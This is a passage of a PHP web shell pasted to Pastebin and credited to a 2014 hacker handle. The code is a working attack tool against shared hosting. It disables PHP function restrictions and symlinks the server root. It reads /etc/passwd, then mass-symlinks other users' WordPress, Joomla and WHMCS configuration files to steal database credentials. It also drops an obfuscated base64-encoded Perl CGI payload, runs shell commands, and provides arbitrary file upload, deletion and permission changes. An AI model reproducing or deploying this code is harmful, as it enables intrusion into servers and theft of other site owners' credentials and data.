  1339. <?php
  1340.     if(isset($_POST['ini']))
  1341.     {
  1342.        
  1343.         $r=fopen('php.ini','w');
  1344.         $rr=" disbale_functions=none ";
  1345.         fwrite($r,$rr);
  1346.         $link="<a href=php.ini><font color=red size=2 face=\"comic sans ms\"><u>open this link in new tab to run PHP.INI</u></font></a>";
  1347.         echo $link;
  1348.        
  1349.         }
  1350.    
  1351.    
  1352.    
  1353.     ?>
  1354. <?php
  1355.     error_reporting(0);
  1356.     echo "<font color=red size=2 face=\"comic sans ms\">";
  1357.     if(isset($_POST['su']))
  1358.     {
  1359.     mkdir('security',0777);
  1360. $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1361. $g = fopen('security/.htaccess','w');
  1362. fwrite($g,$rr);
  1363. $security = symlink("/","security/root");
  1364.             $rt="<a href=security/root><font color=white size=3 face=\"comic sans ms\"> Success </font></a>";
  1365.         echo "Check link given below for / folder symlink <br><u>$rt</u>";
  1366.        
  1367.         $dir=mkdir('SECURITY',0777);
  1368.         $r  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1369.         $f = fopen('SECURITY/.htaccess','w');
  1370.    
  1371.         fwrite($f,$r);
  1372.         $consym="<a href=SECURITY/><font color=white size=3 face=\"comic sans ms\">configuration files</font></a>";
  1373.         echo "<br>The link given below for configuration file symlink...open it, once processing finish <br><u><font color=red size=2 face=\"comic sans ms\">$consym</font></u>";
  1374.        
  1375.             $usr=explode("\n",$_POST['user']);
  1376.         $configuration=array("wp-config.php","wordpress/wp-config.php","web/wp-config.php","wp/wp-config.php","press/wp-config.php","wordpress/beta/wp-config.php","news/wp-config.php","new/wp-config.php","blogs/wp-config.php","home/wp-config.php","blog/wp-config.php","protal/wp-config.php","site/wp-config.php","main/wp-config.php","test/wp-config.php","wp/beta/wp-config.php","beta/wp-config.php","joomla/configuration.php","protal/configuration.php","joo/configuration.php","cms/configuration.php","site/configuration.php","main/configuration.php","news/configuration.php","new/configuration.php","home/configuration.php","configuration.php","SSI.php","forum/SSI.php","forum/inc/config.php","forum/includes/config.php","upload/includes/config.php","cc/includes/config.php","vb/includes/config.php","vb3/includes/config.php","cpanel/configuration.php","panel/configuration.php","ubmitticket.php","manage/configuration.php","myshop/configuration.php","beta/configuration.php","includes/config.php","lib/config.php","conf_global.php","inc/config.php","icl/config.php","include/db.php","include/config.php","includes/functions.php","includes/dist-configure.php","connect.php","mk_conf.php","config/koneksi.php","system/sistem.php","config.php","Settings.php","settings.php","sites/default/settings.php","smf/Settings.php","forum/Settings.php","forums/Settings.php","host/configuration.php","hosting/configuration.php","hosts/configuration.php","zencart/includes/dist-configure.php","shop/includes/dist-configure.php","whm/configuration.php","whmc/configuration.php","whmcs/configuration.php","whmc/WHM/configuration.php","whm/WHMCS/configuration.php","whm/whmcs/configuration.php","order/configuration.php","support/configuration.php","supports/configuration.php","oscommerce/includes/configure.php","oscommerces/includes/configure.php","shopping/includes/configure.php","sale/includes/configure.php","config.inc.php","amember/config.inc.php","clients/configuration.php","client/configuration.php","clientes/configuration.php","cliente/configuration.php","clientsupport/configurtion.php","billing/configuration.php","billings/configuration.php","admin/conf.php","datas/config.php","e107_config.php","/default/settings.php","admin/config.php");
  1377.         foreach($usr as $uss )
  1378.         {
  1379.             $us=trim($uss);
  1380.                        
  1381.             foreach($configuration as $c)
  1382.             {
  1383.              $rs="/home/".$us."/public_html/".$c;
  1384.              $r="SECURITY/".$us." .. ".$c;
  1385.              symlink($rs,$r);
  1386.            
  1387.         }
  1388.            
  1389.             }
  1390.        
  1391.        
  1392.         }
  1393.    
  1394.    
  1395.    
  1396.     ?>
  1397. <?php
  1398.     if(isset($_POST['usre'])){
  1399.         ?><form method=post>
  1400. <textarea rows=10 cols=50 name=user><?php  $users=file("/etc/passwd");
  1401. foreach($users as $user)
  1402. {
  1403. $str=explode(":",$user);
  1404. echo $str[0]."\n";
  1405. }
  1406.  
  1407. ?>
  1408.     </textarea><br><br>
  1409. <input type=submit name=su value="Start Extract" /></form>
  1410. <?php } ?>
  1411. <form method=post>
  1412. <font color=white size=2 face="comic sans ms">Click this button to open manual symlink form</font><p>
  1413. <input type=submit name=man value="Open Manual symlink form"/></form>
  1414. <?php
  1415.     if(isset($_POST['man']))
  1416. {  
  1417. ?>
  1418. <form method=post>file link that you want symlink:-<input type=text name=dli value="/home/user/public_html/config.php">&nbsp file name with which you want represent symlink :-<input type=text name=fna value="owned.txt"><br>use .txt(owned.txt) or no extension(owned) for file which will represent symlink<br><br><input type=submit name=manual value="Lets do it "></form>
  1419. <?php  
  1420. }  
  1421.     ?>
  1422. <?php
  1423.     error_reporting(0);
  1424.     if(isset($_POST['manual']))
  1425.     {
  1426.     $dlink=trim($_POST['dli']);
  1427.      $fna=trim($_POST['fna']);
  1428.      mkdir('SECURITY',0777);
  1429.     $acc = " Options all \n DirectoryIndex security.html  \n Require None \n Satisfy Any";
  1430. $ha = fopen('SECURITY/.htaccess','w');
  1431. fwrite($ha,$acc);
  1432. $final="SECURITY/".$fna;
  1433. symlink($dlink,$final);
  1434.      
  1435. echo "<br>File link for Symlink ".$dlink." link >>> <a href=".$final."><font color=red size=3>is here</font></a>";
  1436. }
  1437.     ?>
  1438. <form method=post>
  1439. <font color=white size=2 face="comic sans ms">Click this button for running Perl based symlink </font><p>
  1440. <input type=submit name=passx value="Eval"><p></form>
  1441. <?php
  1442. if(isset($_POST['passx']))
  1443. {
  1444.     ?>
  1445. <textarea style="background:black;color:white" rows=20 cols=50 name=usernames><?php  $users=file("/etc/passwd");
  1446. foreach($users as $user)
  1447. {
  1448. $str=explode("\n",$user);
  1449. echo $str[0]."\n";
  1450. }
  1451.  
  1452. ?></textarea>
  1453. <?php
  1454. }
  1455.  
  1456.  
  1457.  
  1458. ?>
  1459. <form method=post>
  1460. <font size=5 color=white> <input type=submit name=perl value="Configuration File Killer"> </font></form>
  1461. <p>
  1462. <?php
  1463. if(isset($_POST['perl']))
  1464. {
  1465.     error_reporting(0);
  1466.  
  1467. $da='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';
  1468. $decryp=gzinflate(base64_decode($da));
  1469. mkdir('perl', 0777);
  1470. $hope = fopen("perl/.htaccess", 'w');
  1471. $hcon= "Options FollowSymLinks MultiViews Indexes ExecCGI\nAddType application/x-httpd-cgi .root\nAddHandler cgi-script .root\nAddHandler cgi-script .root";
  1472. fwrite ( $hope, $hcon ) ;
  1473. $pelfile = fopen("perl/in.root" ,"w");
  1474. fwrite ($pelfile,$decryp);
  1475.     chmod("perl/in.root",0755);
  1476.    echo "<iframe src=perl/in.root width=50% height=70% ></iframe><br><br> ";
  1477.    echo "<font size=4>check in this directory for configuration files once you have done with this script<br><a href=perl/><u>Open Configuration File</u></a></font>";
  1478.  
  1479. }
  1480. ?>
  1481. <form method=post>
  1482. <font color=white size=2>Symlink bypasser ( Use this tools if Cant read /etc/named ) </font><p>
  1483. <input type=submit name="ms" value="Let's play with us  " /></form>
  1484. <?php
  1485.     if(isset($_POST['ms']))
  1486.     {
  1487.         error_reporting(0);
  1488.         $cmd="ls /var/named";
  1489.         $r=shell_exec($cmd);
  1490.        
  1491.  
  1492.         mkdir('SymSec',0777);
  1493.  
  1494.  
  1495.  
  1496.  
  1497. $rr  = " Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  1498. $f = fopen('SymSec/.htaccess','w');
  1499.  
  1500. $security = symlink("/","SymSec/root");
  1501.  
  1502. fwrite($f , $rr);
  1503.         ?><form method=post><textarea rows=1 cols=1 name=web><?php echo $r;?></textarea><br><input type=submit name=w value="Start the game " />
  1504. </form>
  1505. <?php
  1506.        
  1507.         }
  1508.    
  1509. error_reporting(0);
  1510. $webs=explode("\n",$_POST['web']);
  1511. if(isset($_POST['w']))
  1512. {
  1513. $webs=explode("\n",$_POST['web']);
  1514. echo "<table width=40% align=center border=1>
  1515. <tr><td align=center>Websites</td><td align=center>usernames</td><td>symlink</td></tr>";
  1516. foreach($webs as $f)
  1517. {
  1518.     $str=substr_replace($f,"",-4);
  1519.    
  1520.  
  1521. $user = posix_getpwuid(@fileowner("/etc/valiases/".$str));
  1522.  
  1523. echo "<table border=1 width=40%><tr><td align=center><font color=red>".$str."</font></td><td align=center><font color=white>".$user['name']."</td><td><a href=SymSec/root/home/".$user['name']."/public_html/>Open the Symlink file</a></tr></table>"; flush();
  1524.  
  1525.  
  1526.    
  1527.    
  1528.    
  1529.     }  
  1530.    
  1531.     }
  1532.  
  1533.  
  1534. ?>
  1535. <?php
  1536. echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
  1537. echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
  1538. if( $_POST['_upl'] == "Upload" ) {
  1539. if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload Success  ^_^ <b><br><br>'; }
  1540. else { echo '<b>Upload Failed :(  </b><br><br>'; }
  1541. }
  1542. ?>
  1543. <?php
  1544. //Make directory stuff
  1545. if (isset($_POST['do_create_dir'])) {
  1546.     $cdir = $_POST['create_dir'];
  1547.     if (is_dir($cdir)) {
  1548.         success("dir_exists", $cdir);
  1549.     } else {
  1550.         if (mkdir($cdir, 0777)) {
  1551.             success("createdir", $cdir);
  1552.         } else {
  1553.             error("Directory was not created!");
  1554.         }
  1555.     }
  1556. }
  1557. //Make file stuff
  1558. if (isset($_POST['do_create_file'])) {
  1559.     $cfile = $_POST['create_file'];
  1560.     if (file_exists($cfile)) {
  1561.         success("file_exists", $cfile);
  1562.     } else {
  1563.         if (fopen($cfile, "w+")) {
  1564.             success("file_created", $cfile);
  1565.         } else {
  1566.             error("File was not created");
  1567.         }
  1568.     }
  1569. }
  1570. //Go directory
  1571. if (isset($_POST['do_go_dir'])) {
  1572.     $godir = $_POST['go_dir'];
  1573.     echo "<script>window.location = 'http://$domain$script?path=$godir'</script>";
  1574. }
  1575. //Go Edit file
  1576. if (isset($_POST['do_go_edit'])) {
  1577.     $gefile = $_POST['go_edit_file'];
  1578.     if (file_exists($gefile)) {
  1579.         header("Location: http://$domain$script?editfile=$gefile");
  1580.     } else {
  1581.         error("File does not exist!");
  1582.     }
  1583. }
  1584. //Upload File
  1585. if (isset($_POST['do_upload_file'])) {
  1586.     $udir = $_POST['upload_location'];
  1587.     $uname = $_FILES['upload_file']['name'];
  1588.     $both = "$udir$uname";
  1589.     if (file_exists($both)) {
  1590.         success("file_exists", $both);
  1591.     } else {
  1592.         switch ($_FILES['upload_file']['error']) {
  1593.             case 0:
  1594.                 if (@move_uploaded_file($_FILES['upload_file']['tmp_name'], $udir . '/' . $uname)) {
  1595.                     success("file_uploaded");
  1596.                 } else {
  1597.                     error("Failed To Upload File!");
  1598.                 }
  1599.         }
  1600.     }
  1601. }
  1602. //Kill Shell
  1603. if (isset($_GET['kill'])) {
  1604.     if (unlink("$dir/$script2")) {
  1605.         success("shell_killed");
  1606.     } else {
  1607.         error("Failed to kill shell!");
  1608.     }
  1609. }
  1610. //Delete Directory
  1611. if (isset($_GET['deldir'])) {
  1612.     $deldir = $_GET['deldir'];
  1613.     $redir = dirname($deldir);
  1614.     if (rmdir($deldir)) {
  1615.         success("dir_del", rtrim($redir, '/'));
  1616.     } else {
  1617.         error("Failed to delete directory!");
  1618.     }
  1619. }
  1620. //Rename Directory
  1621. if (isset($_GET['rendir'])) {
  1622.     $rendir = $_GET['rendir'];
  1623.     $dend = $_GET['old'];
  1624.     echo "<center>
  1625. <form action='' method='post'>
  1626. <input type='text' class='text' name='new_dir_name' value='$dend'>
  1627. <input type='submit' name='do_rename_dir' value='Rename'>
  1628. </center>";
  1629. }
  1630. if (isset($_POST['do_rename_dir'])) {
  1631.     $newdir = $_POST['new_dir_name'];
  1632.     $rendir = $_GET['rendir'];
  1633.     $dend = $_GET['old'];
  1634.     if (rename("$rendir/$dend", "$rendir/$newdir")) {
  1635.         success("dir_renamed", $rendir);
  1636.     } else {
  1637.         error("Directory was not renamed!");
  1638.     }
  1639. }
  1640. //Delete file
  1641. if (isset($_GET['delfile'])) {
  1642.     $delfile = $_GET['delfile'];
  1643.     $redir = dirname($delfile);
  1644.     if (unlink($delfile)) {
  1645.         success("filedelete", rtrim($redir, '/'));
  1646.     } else {
  1647.         error("Failed to delete file!");
  1648.     }
  1649. }
  1650. //Rename File
  1651. if (isset($_GET['renfile'])) {
  1652.     $renfile = $_GET['renfile'];
  1653.     $fend = $_GET['old'];
  1654.     echo "<center>
  1655. <form action='' method='post'>
  1656. <input type='text' class='text' name='new_file_name' value='$fend'>
  1657. <input type='submit' name='do_rename_file' value='Rename'>
  1658. </center>";
  1659. }
  1660. if (isset($_POST['do_rename_file'])) {
  1661.     $newfile = $_POST['new_file_name'];
  1662.     $renfile = $_GET['renfile'];
  1663.     $fend = $_GET['old'];
  1664.     if (rename("$renfile/$fend", "$renfile/$newfile")) {
  1665.         success("file_renamed", $renfile);
  1666.     } else {
  1667.         error("File was not renamed!");
  1668.     }
  1669. }
  1670. //Mass Files Stuff
  1671. if (isset($_POST['mass_files'])) {
  1672.     $action = $_POST['mass_action'];
  1673.     $chmodvalue = $_POST['chmod_value'];
  1674.     $box = $_POST['delbox'];
  1675.     if ($action == "Delete") {
  1676.         foreach ($box as $b) {
  1677.             if (is_dir($b)) {
  1678.                 if (rmdir($b)) {
  1679.                     echo "<font color='green'>Deleted Directory: $b</font><br>";
  1680.                 } else {
  1681.                     echo "<font color='red'>Failed To Delete Directory: $b</font><br>";
  1682.                 }
  1683.             } else {
  1684.                 if (unlink($b)) {
  1685.                     echo "<font color='green'>Deleted File: $b</font><br>";
  1686.                 } else {
  1687.                     echo "<font color='red'>Failed To Delete file: $b</font><br>";
  1688.                 }
  1689.             }
  1690.         }
  1691.     }
  1692.     if ($action == "chmod") {
  1693.         foreach ($box as $b) {
  1694.             if (is_dir($b)) {
  1695.                 if (chmod($b, $chmodvalue)) {
  1696.                     echo "<font color='green'>Changed Permissions Of Directory: $b</font><br>";
  1697.                 } else {
  1698.                     echo "<font color='red'>Failed To Change Permissions Of Directory: $b</font><br>";
  1699.                 }
  1700.             } else {
  1701.                 if (chmod($b, $chmodvalue)) {
  1702.                     echo "<font color='green'>Changed Persmissions Of File: $b</font><br>";
  1703.                 } else {
  1704.                     echo "<font color='red'>Failed To Change Permissions Of File: $b</font><br>";
  1705.                 }
  1706.             }
  1707.         }
  1708.     }
  1709. }
  1710. ?>
  1711. <footer>
  1712. <p>Copyright 2014 by: <a href="fb.com/Hacker.shtml">FirmanLidielError</a></p>
  1713. </footer>
  1714. </body>
  1715. </html>
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top